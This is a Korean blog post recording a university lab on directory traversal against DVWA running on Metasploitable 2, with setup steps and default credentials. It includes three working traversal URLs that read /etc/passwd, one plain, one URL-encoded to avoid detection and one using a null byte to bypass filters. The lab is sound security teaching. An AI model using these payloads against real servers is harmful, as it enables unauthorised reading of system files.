[모의해킹] 웹 서비스 취약점을 이용한 디렉토리 이동 공격

! 이 포스트의 내용은 (2019년)  전공 강의에서 다룬 리눅스 보안 실습의 기록용이며, 이는 학습 목적으로만 사용되어야 합니다.

! 어떠한 경우에도 이러한 기술을 악용하거나 불법적인 활동에 사용해서는 안 됩니다.

 

! 모의 해킹과 관련된 실습은 합법적인 환경에서만 수행되어야 하며, 무단으로 다른 사람의 시스템에 접근하는 등의 행위는 법적인 문제로 이어질 수 있습니다. 이러한 기술을 사용할 때에는 항상 윤리적인 책임을 갖고 행동해야 합니다.

 

1️⃣ 디렉토리 이동 공격 개요

🔹1. 디렉토리 이동 공격이란?

디렉토리 이동 공격은 웹 애플리케이션이 사용자 입력을 제대로 검증하지 않을 경우, 공격자가 파일 시스템 내의 민감한 파일에 접근할 수 있도록 하는 취약점이다. 이 공격을 통해 ``/etc/passwd``와 같은 시스템 파일을 읽거나, 서버 내의 중요한 설정 파일을 유출 할 수 있다.

---

2️⃣ 실습 환경 구성 준비

🔹1. 실습 환경 구성

이번 실습에서는 Metasploitable과 DVWA를 활용하여 디렉토리 이동 공격을 수행할 것이다.

• ``Metasploitable 2``: 취약한 웹 애플리케이션이 포함된 테스트용 가상 머신
• ``DVWA``: 웹 보안 테스트를 위한 취약한 PHP 기반 웹 애플리케이션

---

🔹2. Metasploitable 웹 서비스 디렉토리 설정 확인

• 먼저, Metasploitable 서버에서 웹 서비스 디렉토리 설정을 확인해야 한다.

cat /etc/apache2/sites-enabled/000-default

• 설정 파일에서 ``Indexes`` 옵션이 활성화되어 있으면, 디렉토리 이동 공격이 가능할 수 있다.
• ``Indexes``: 디렉토리 내에 기본 인덱스 파일(index.html 등)이 없을 경우, 해당 디렉토리의 파일 목록을 자동으로 노출시킨다.

---

🔹3. 웹 루트 디렉토리 탐색

• 웹 루트 디렉토리(/var/www)로 이동한 후 내부 파일 및 폴더를 확인한다.
• 이 과정에서 ``dvwa`` 디렉토리가 존재하는 지 확인한다.

cd /var/www
ls -l

---

🔹4. Metasploitable의 IP 주소 확인

• Metasploitable의 IP 주소를 확인하여 웹 애플리케이션에 접근할 준비를 한다.

ifconfig

---

3️⃣ DVWA 설정 및 접속

🔹1. DVWA 웹 페이지 접속 및 설정 변경

• 브라우저를 열고 ``Metasploitable``의 IP 주소를 입력하여 DVWA 사이트에 접속한다.

• 로그인 페이지에서 다음과 같이 입력하여 로그인한다.
  • Username: ``admin``
  • Password: ``password``

• 로그인 후 보안 레벨을 ``Low``로 설정한다.

---

4️⃣ 디렉토리 이동 공격 실습

🔹1. 기본적인 디렉토리 이동 공격

• 취약점이 존재하는 URL에서 디렉토리 이동 공격을 시도한다.

http://[URL]/dvwa/vulnerabilities/fi/?page=../../../../../etc/passwd

• 이 공격을 통해 ``/etc/passwd`` 파일에 접근할 수 있다.

---

🔹2. URL 인코딩을 활용한 공격

• URL 인코딩을 적용하여 공격이 탐지되지 않도록 변형할 수 있다.

http://[URL]/dvwa/vulnerabilities/fi/?page=%2E%2E%2F/%2E%2E%2F/%2E%2E%2F/%2E%2E%2F/%2E%2E%2F/etc/passwd

---

🔹3. Null 바이트 삽입 공격

• 일부 보안 필터를 우회하기 위해 ``null byte (%00)``을 추가하여 공격을 시도할 수도 있다.

http://[URL]/dvwa/vulnerabilities/fi/?page=%2E%2E%2F/%2E%2E%2F/%2E%2E%2F/%2E%2E%2F/%2E%2E%2F/etc/passwd%00html

---